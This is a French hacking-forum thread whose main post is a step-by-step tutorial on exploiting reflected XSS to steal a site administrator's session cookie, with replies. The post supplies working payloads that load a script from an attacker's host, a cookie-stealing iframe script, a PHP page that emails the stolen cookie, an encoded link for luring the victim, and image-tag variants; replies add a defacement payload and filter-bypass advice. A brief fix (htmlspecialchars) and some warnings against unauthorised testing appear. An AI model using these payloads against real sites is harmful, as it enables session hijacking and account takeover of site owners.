• STATISTIQUES
  • Il y a eu un total de 1 membres et 921 visiteurs sur le site dans les dernières 24h pour un total de 922 personnes!


    Membres: 2 097
    Discussions: 3 554
    Messages: 32 736
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Listbrain Version 3
    Site proposant 66 challenges présentés dans une liste mélangée.
    Challenges
    [FR] Comment ca marche
     Gratuit et accessible à tous, ce site de communauté permet de se dépanner, se faire aider ...
    Webmaster
    [FR] Microcontest
    Cryptographie: 7, Mathématiques: 8, Image Son Vidéo: 5, Intelligence artificielle: 3, Réseau: 2, Divers: 7, Phy...
    Challenges
    [FR] Le site du zero
    Découvrez gratuitement la programmation (C, C++, PHP, MySQL, XHTML, CSS...), Linux, le Mapping, la modé...
    Programmation
    [EN] Sabre Films
    Site de challenge présenté sous la forme d'une quête. Vous êtes un détective et devrez résoudre d...
    Challenges
    [EN] social-engineer
    Site dédié au Social Engineering en général.
    Hacking
    [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Comment est exploitée une faille XSS

Je vais inclure ce tuto dans les articles du site au courant de la semaine et essayer d'en composer sur une base régulière. Ça fait longtemps que j'y pensais, alors le voici en exclusivité sur PN.

Premièrement, le nom XSS vient de l’acronyme 'Cross Site Scripting' et non CSS qui peut porter à confusion avec 'Cascading Style Sheet' qui se trouve à être quelque chose de complètement différent.

Dans ce tuto, je vais vous expliquer comment une exploitation de cette faille peut être réalisée par une personne malveillante pour lui permette de recevoir par email le cookie du webmaster.

Comment reconnaître une faille XSS et comment elle se produit.
On analyse l’URL 'Uniform Resource Locator' (Adresse internet) qui peut nous donner plusieurs informations sur la façon dont les variables sont passées de page en page. Pour quelqu'un qui connaît beaucoup le codage web, c’est une très bonne façon d’imaginer comment la page est codée.

Voici un exemple d’URL qui pourrait être vulnérable.
Code :
http://www.lesite.com/index.php?var=pseudo&mod=1&...

Vous avez sûrement déjà remarqué des adresses longues d’un mètre, pleines d’information… Dans ce cas si, remarquez l’expression (var=pseudo). Mais qu'est-ce que ça veut dire? Simplement que la variable ici appelée (var) va porter la valeur (pseudo). Pour récupérer cette variable, le webmaster utilise ($_GET[var]). L’erreur qui provoque la faille XSS est que si cette variable est directement affichée dans la page sans être filtrée, on peut l’utiliser pour passer du code JavaScript directement dans la page. Pour savoir si une variable est vulnérable, il faut d’abord la tester. La façon la plus simple, c’est de générer une alerte javascript.

Code :
http://www.lesite.com/index.php?var=<script>alert()</script>&mod=1&...

Si vous voyez une boite d’alerte s’ouvrir, c’est que le site est vulnérable.*

Comment exploiter la faille XSS
Maintenant que nous savons que le site en question ne filtre pas les caractères de programmation avant d'inclure la variable dans sa page, nous pouvons en profiter pour passer aux choses sérieuses. Puisque les caractères passés dans l’URL sont limités en nombres, nous devrons procéder à l’inclusion d’une page .js afin de pouvoir inclure tout notre codage sans limitation.

Voici donc à quoi cela ressemblerait.
Code :
http://www.lesite.com/index.php?var=<SCRIPT%20SRC=http://tonsite.com/cookie.js></SCRIPT>&mod=1&...
(Petite remarque, la chaîne %20 est simplement un espace encodé. Nous en reparlerons plus tard)

C’est ici que la plus part des tuto arrête. Mais aujourd’hui, nous allons pousser le sujet plus loin et se rendre jusqu’à l’exploitation complète de la faille.

Afin de pouvoir recevoir le cookie par courriel, nous devons réussir à fabriquer un codage qui va ouvrir une page de façon parallèle et qui contient comme variable le cookie en question.

Dans le fichier cookie.js, nous allons ouvrire un IFRAME qui inclura en variable le cookie de la personne. Voici le codage.

Code :
document.write('<iframe src=http://tonsite.com/cookie.php?cookie='+document.cookie+' HEIGHT=0 WIDTH=0></iframe>');

Ce codage va envoyer à cookie.php la variable (cookie) qui elle contient la valeur du cookie de la personne qui va cliquer sur le lien. Il nous reste simplement à créé le codage qui va récupérer tout ça et nous l’envoyer par email.

Dans le fichier cookie.php, le code va ressembler à ceci.
Code PHP :
<?php  
// Envoy du cookie par email  
$a "ton@adresse.com";  
$sujet "Exploitation XSS";  

// Codage HTML du message  
$message "<p style='margin-top: 0; margin-bottom: 0' align='center'>Vous venez de recevoir un cookie!</p>  
<p style='margin-top: 0; margin-bottom: 0' align='center'>&nbsp;</p>  
<p style='margin-top: 0; margin-bottom: 0'><b>
$_GET[cookie]</b></p>"

// Envoy du email 
$marge  "From: $a\r\n"
$marge .= "Content-type: text/html\r\n"
mail($a$sujet$message$marge); 
?>

Bien entendu, vous pouvez en profiter pour vous envoyer quelques informations supplémentaires sur la personne comme sont adresse IP qui peut toujours servirent pour d'autres sortes d'attaque.

Maintenant que nous avons tout mis en place, il ne vous reste plus qu'a utiliser un peut de SE (Social Engineering) Afin de demander au webmaster de bien gentiment cliquer sur le lien trafiqué. Pour cacher un peut le code malicieux, vous prouvez utiliser un Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.. Le résultat ressemblerait à ceci :

Code :
http://www.lesite.com/index.php?var=%3CSCRIPT%2520SRC%3Dhttp%3A%2F%2Fx-hc.com%2F11.js%3E%3C%2FSCRIPT%3E&mod=1&...

Ceci peut également déjouer certain système de filtration et c'est un peu moins évident à deviner ... quoi que toujours un peut visible ...

Pousser plus loin...
Il existe énormément de place différente ou les failles XSS peuvent se produire. Plus récemment, plusieurs CMS se sont trouvés vulnérables au niveau des avatars et des inclusions d'images dans les messages en utilisant la balise IMG comme couverture.

Code :
<IMG SRC="javascript:alert();">

Ou simplement fermer la balise IMG et poursuivre avec le code JS
Code :
"><SCRIPT%20SRC=http://tonsite.com/cookie.js></SCRIPT>

Ce qui donnerait dans la source HTML
Code :
<IMG SRC=""><SCRIPT%20SRC=http://tonsite.com/cookie.js></SCRIPT>

Ce protégé
Désormais, ayant vu l'exploitation qui peut en être faite, voici la sécurisation de cette faille :

Utiliser de façon systématique la fonction htmlspecialchars ou htmlentities sur les données non sûres (venant des users) avant leur AFFICHAGE, et seulement l'affichage, pas le stockage. (qui lui est inutile).

Soyez intelligent et restez WhiteHat!
Par CyberSee
28-01-2007, 12h32 (Ce message a été modifié le : 17-10-2011 23h45 par Di0Sasm.)
Message : #1
julian Hors ligne
Bon membre
*



Messages : 386
Points: 0
Inscription : Oct 2005
Comment exploiter une faille XSS
Très bon tutos Wink
03-06-2011, 03h09 (Ce message a été modifié le : 17-10-2011 23h46 par Di0Sasm.)
Message : #2
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,717
Points: 156
Inscription : Jan 2012
Comment exploiter une faille XSS
Merci :-)
Je vais essayer de vous en pondre au moins 1 par semaine ... quoique si je peux en faire plus, ça va me faire plaisir :-). J'ai l'intention de faire le tour de toutes mes connaissances à l'écrit. Je me rends compte que j’ai accumulé beaucoup de bagage avec le temps. C’est moche d’avoir tout perdu ceux que j’ai composés pour NewbieCenter … :-(
23-04-2012, 11h55
Message : #3
Apache9 Hors ligne
Membre
*



Messages : 39
Points: 1
Inscription : Apr 2012
RE: Comment exploiter une faille XSS
Merci très bon tutoriel, par contre je reçois le mail 5 par 5 normale ? ^^ Par exemple je lance l'exploit et après je reçois 5 fois le mail "Exploitation XSS".
23-04-2012, 22h46 (Ce message a été modifié le : 06-05-2012 14h54 par ﮎyиthﮎtyℓє.)
Message : #4
ﮎyиthﮎtyℓє Hors ligne
Membre
*



Messages : 32
Points: 16
Inscription : Mar 2012
RE: Comment exploiter une faille XSS
parce-que le code et afficher à plusieurs endroit sur ta page.

btw
Code :
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>pwnd</h1></div>";</script>
ça s'du deface.
30-05-2012, 23h34
Message : #5
...:: BliNK ::... Hors ligne
Membre actif
*



Messages : 84
Points: 2
Inscription : May 2012
RE: Comment exploiter une faille XSS
Merci, très beau tutoriel !
10-06-2012, 17h26
Message : #6
ThibauT Hors ligne
Keyboard not found, press F1 to resume.
*



Messages : 348
Points: 69
Inscription : Jun 2012
RE: Comment exploiter une faille XSS
J'aime tes tutoriels. Ils expliquent simplement des choses qui ne le sont pas forcément.

Martin Golding a écrit :"Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live."

Gnomino a écrit :et quand je suis payé je fais ce qu'on me demande :B
29-06-2012, 19h56
Message : #7
hydegollam Hors ligne
Newbie
*



Messages : 16
Points: 0
Inscription : Jun 2012
RE: Comment exploiter une faille XSS
Malin le coup des images d'avatar ou du BBcode !
Merci bien pour le tuto Smile
20-08-2012, 10h18
Message : #8
spgb Hors ligne
Membre
*



Messages : 37
Points: 0
Inscription : Aug 2012
RE: Comment exploiter une faille XSS
Bon tutoriel, merci, j'avais déjà lu d'autres tutoriel du genre mais le tiens va effectivement plus loin Wink
17-10-2012, 09h18
Message : #9
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Points: 299
Inscription : Dec 2011
RE: Comment exploiter une faille XSS
Bon tuto, il manque seulement la correction de cette faille qui est simple :
Utiliser de façon systématique la fonction htmlspecialchars ou htmlentities sur les données non sûres (venant des users) avant leur AFFICHAGE, et seulement l'affichage, pas le stockage.

Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
27-10-2012, 17h53
Message : #10
Quintinou
Non-enregistré



 
RE: Comment exploiter une faille XSS
J'ai essayé sur un site, mais pas de boîte de dialogue ouverte Sad Mais, une erreur sql : Erreur:
Code :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') blabla...

Ca sent la faille sql à plein nez, nan ? Smile

Les outils tel sqlmap permettent je pense de détecter ce type de faille, mais laisse de nombreuses traces de requêtes si je ne me trompe pas ?
28-10-2012, 09h51
Message : #11
supersnail Hors ligne
Éleveur d'ornithorynques
*****



Messages : 1,588
Points: 465
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Uep, ça laisse pas mal de traces.

Sinon, évite de faire du pentest sauvage sur des sites au hasard parce qu'en plus de pas trop être dans l'esprit de la communauté, tu risques pas mal d'ennuis si l'admin du site est un poil susceptible (il peut t'attaquer pour intrusion, même si t'as pas de motivations malveillantes)

btw @CyberSee, ce serait cool si tu pouvais edit le tuto pour éviter d'inciter les débutants à faire du pentest sauvage Wink

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
28-10-2012, 14h32
Message : #12
Quintinou
Non-enregistré



 
RE: Comment exploiter une faille XSS
Hello,

Qui a dit que j'ai fait du pentest sauvage ? Rolleyes
Je n'ai rien fait du tout pour l'instant, à part modifier l'url pour tester la sécurité, et j'suis tomber sur une erreur sql, rien de plus Wink
28-10-2012, 14h38
Message : #13
Swissky Absent
Bon membre
*



Messages : 523
Points: 96
Inscription : Apr 2012
RE: Comment exploiter une faille XSS
JUstement si tu as modifié l'url pour tester la sécu sans en avoir préalablement averti le webmaster c'est du Pentest Sauvage
31-12-2012, 13h17
Message : #14
Wabouz Hors ligne
Membre actif
*



Messages : 96
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
À quoi correspond le fichier cookie.js?

C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
31-12-2012, 13h19
Message : #15
supersnail Hors ligne
Éleveur d'ornithorynques
*****



Messages : 1,588
Points: 465
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Citation :Dans le fichier cookie.js, nous allons ouvrire un IFRAME qui inclura en variable le cookie de la personne. Voici le codage.

Code :
document.write('<iframe src=http://tonsite.com/cookie.php?cookie='+document.cookie+' HEIGHT=0 WIDTH=0></iframe>');

Je pense que ça répond à la question :>

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
31-12-2012, 13h21
Message : #16
Wabouz Hors ligne
Membre actif
*



Messages : 96
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
Nan justement c'est de là que vient ma question, doit-on créer ce fichier? ou est-ce qu'on le trouve à un endroit?

C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
31-12-2012, 13h23
Message : #17
Swissky Absent
Bon membre
*



Messages : 523
Points: 96
Inscription : Apr 2012
RE: Comment exploiter une faille XSS
On doit le créer il sert a recuperer le cookie via la fonction JAVASCRIPT : document.cookie puis fait une redirection sur une page avec le cookie en parametre GET (cf: GET et POST en PHP) Wink
31-12-2012, 13h26
Message : #18
Wabouz Hors ligne
Membre actif
*



Messages : 96
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
D'accooooord, okay, merci beaucoup Smile

C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
31-12-2012, 13h26
Message : #19
supersnail Hors ligne
Éleveur d'ornithorynques
*****



Messages : 1,588
Points: 465
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Ben le fichier cookie.js contient le code qui a été écrit (donc c'est à toi de le créer Wink ).

Enfin la faille elle permet à l'attaquant d'exécuter un javascript de son choix, qui peut être un "cookie stealer" (comme le montre CyberSee), mais sinon ça pourrait être un truc plus dangereux du genre une sorte de worm (comme a connu myspace y'a quelques années), ou pire, une sorte de page de "phishing" (principe en quelque sorte repris dans les "webinject" réalisés par les trojan de type banker, mais là je m'égare...).

Enfin bref, la XSS te permet d'exécuter n'importe quel bout de code JS de ton choix sur le site "victime" (bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
03-01-2013, 15h19
Message : #20
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,717
Points: 156
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Citation :(bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )

lol effectivement!

Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
06-01-2013, 11h30
Message : #21
Ettorhake Hors ligne
Newbie
*



Messages : 11
Points: 1
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour le tuto CyberSee !
10-01-2013, 13h52
Message : #22
freekiss Hors ligne
Newbie
*



Messages : 9
Points: 0
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour ce tuto plus complet que ceux que l'on vois généralement.
11-01-2013, 01h05
Message : #23
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
A par le Cour qui est très bien le titre,lui, n'est pas très bien exprimé si je peux me permettre .. Tongue
Un "Comment exploiter une faille XSS" aurait été mieux Smile

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.
11-01-2013, 14h15
Message : #24
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Points: 299
Inscription : Dec 2011
RE: Comment est exploiter une faille XSS
Sakiir, concernant le titre, c'était auparavant celui-là, mais il as était changer, car il mettez en doute l'orientation de la communauté.

Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
11-01-2013, 17h28
Message : #25
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,717
Points: 156
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Effectivement, c'est ce que j'avais mis au départ ;-)

Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
11-01-2013, 17h50
Message : #26
Swissky Absent
Bon membre
*



Messages : 523
Points: 96
Inscription : Apr 2012
RE: Comment est exploiter une faille XSS
Alors on pourrais le changer en "Comment est exploitée une faille XSS" d'ailleurs le titre sur le forum est different de celui qui s'affiche sur la page :

Comment est exploiter une faille XSS
RE: Comment exploiter une faille XSS
11-01-2013, 20h25
Message : #27
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
ah oui je comprend , enfin c'est exploité quand même Tongue

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.
03-06-2013, 16h32
Message : #28
0pc0deFR Hors ligne
Membre actif
*



Messages : 161
Points: 35
Inscription : May 2013
RE: Comment est exploitée une faille XSS
Sorry pour le déterrage. Régulièrement, des sites utilisent des systèmes de remplacement de caractère pour empêcher l'XSS. Souvent <h1>XSS</h1> va ce transformer en quelque chose comme _h1_XSS_/h1_. Pour bypasser ce genre de système, vous pouvez encoder votre requête: escape html.

A noter que le javascript n'est pas le seul moyen d'exploiter une XSS. Tout langage exécuté coté client peut exploiter une XSS. La balise <h1>XSS</h1> exploit potentiellement une vulnérabilité XSS même si l'intérêt est limité. Les Iframes font des dégâts.

Aussi, il existe deux types d'XSS. Les XSS qu'on retrouve souvent dans les fonctions recherches sont les XSS non stockées, cela signifie que l'exploitation de l'XSS n'est pas systématique ainsi que les XSS stockées, elles seront exécutés à chaque chargement de la page. Elles sont souvent stockées en base de données.

Twitter: Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.
Blog: Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.
03-06-2013, 19h06
Message : #29
CronosDark Hors ligne
Newbie
*



Messages : 5
Points: 1
Inscription : Jun 2013
RE: Comment est exploitée une faille XSS
Merci pour les TRES bon tutoriel ! =)
03-06-2013, 19h14
Message : #30
Mazaki Hors ligne
root@Mazaki~#
*



Messages : 88
Points: 13
Inscription : May 2013
RE: Comment est exploitée une faille XSS
En effet, très bon tutoriel malgré que celui ci ne parle pas de la XSS stockée, qui s'avère encore plus dangereuse qui est (comme notre amis 0pc0deFR l'a si bien dit) stockée généralement dans les bases de données qui peuvent contenir des iframes phishing, drive by download, enfin tout est possible avec ces failles XSS, il n'y a pas que le fait de faire des alertes, ce sont des failles extrêmement courantes et dangereuses.

A méditer

" Signature en construction, revenez dans quelques années. "
03-06-2013, 21h09
Message : #31
gruik Hors ligne
gouteur de savon
*



Messages : 757
Points: 482
Inscription : Oct 2012
RE: Comment est exploitée une faille XSS
yep excellentissime, la page Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici. est elle même encore mieux documentée, et en français en plus
la seule chose qui manque finalement dans la très large majorité des tutos sur des failles archi-connues et archi-tutorialisées par les débutants, ce sont des bouts de code permettant de montrer un exemple de code vulnérable et de code safe pour aider à mieux comprendre
14-06-2013, 22h43
Message : #32
valtena Hors ligne
Newbie
*



Messages : 3
Points: 0
Inscription : Jun 2013
RE: Comment est exploitée une faille XSS
(03-06-2013 21h09)gruik a écrit : Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.la seule chose qui manque finalement dans la très large majorité des tutos sur des failles archi-connues et archi-tutorialisées par les débutants, ce sont des bouts de code permettant de montrer un exemple de code vulnérable et de code safe pour aider à mieux comprendre

J'avoue.Par contre, pour se protéger l'exploitation de la faille avec les images, il suffit de sécuriser les images qui peuvent être modifié par l'utilisateur. Les autres, c'est inutile, c'est bien ça ?
15-06-2013, 09h33
Message : #33
thxer Hors ligne
:(){ :|:& };:
*



Messages : 382
Points: 162
Inscription : Feb 2013
RE: Comment est exploitée une faille XSS
Pour faire réellement le tour de la question voici un ''vrai'' tuto complet :

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.

Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.
Veuillez vous enregistrer pour visualiser l'ensemble du forum en cliquant ici.

Code BASH :
echo "JkZ Palx" | sed 'y/lPZaJxk/MG3@tEH/'
02-12-2014, 23h09
Message : #34
Ambrosios Hors ligne
C'est moi :D
*



Messages : 8
Points: -6
Inscription : Oct 2014
RE: Comment est exploitée une faille XSS
Très complet. Merci beaucoup, je ne sais pas si je vais l'exploiter tout de suite (autrement que sur moi) mais au moins, je me coucherai moins bête ce soir Smile
Merci encore CyberSee pour ce magnifique tuto
03-12-2014, 00h12
Message : #35
gruik Hors ligne
gouteur de savon
*



Messages : 757
Points: 482
Inscription : Oct 2012
RE: Comment est exploitée une faille XSS
ce CyberSee quel bel homme décidément Smile
attention au déterrage de topic encore une fois, pareil dernier post juin 2013...

Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
03-12-2014, 00h26
Message : #36
Ambrosios Hors ligne
C'est moi :D
*



Messages : 8
Points: -6
Inscription : Oct 2014
RE: Comment est exploitée une faille XSS
Okay désolé, j'ai pas fait gaffe…
01-09-2015, 16h07
Message : #37
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,717
Points: 156
Inscription : Jan 2012
RE: Comment est exploitée une faille XSS
Je sais que je m’apprête à commenter sur un événement qui s’est passé en 2014 ... mais je tiens à clarifier un truc.

Enfaite, la règle de déterrage de topique ne s'applique pas à la zone des tutos ... Peut importe quand le tuto est écrit, si quelqu'un a une question, elle ne sera jamais mieux classée qu'en commentaire de ce dernier et ce peut importe la date auquel il est écrit. Tant que le commentaire reste constructif ou informatif et ajoute une plus value à la conversation, je n’ai aucun problème avec ça.

Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>

New Project News White Hat Hacker V2.3
Accueil | Challenges | Tutoriels | Téléchargements | Forum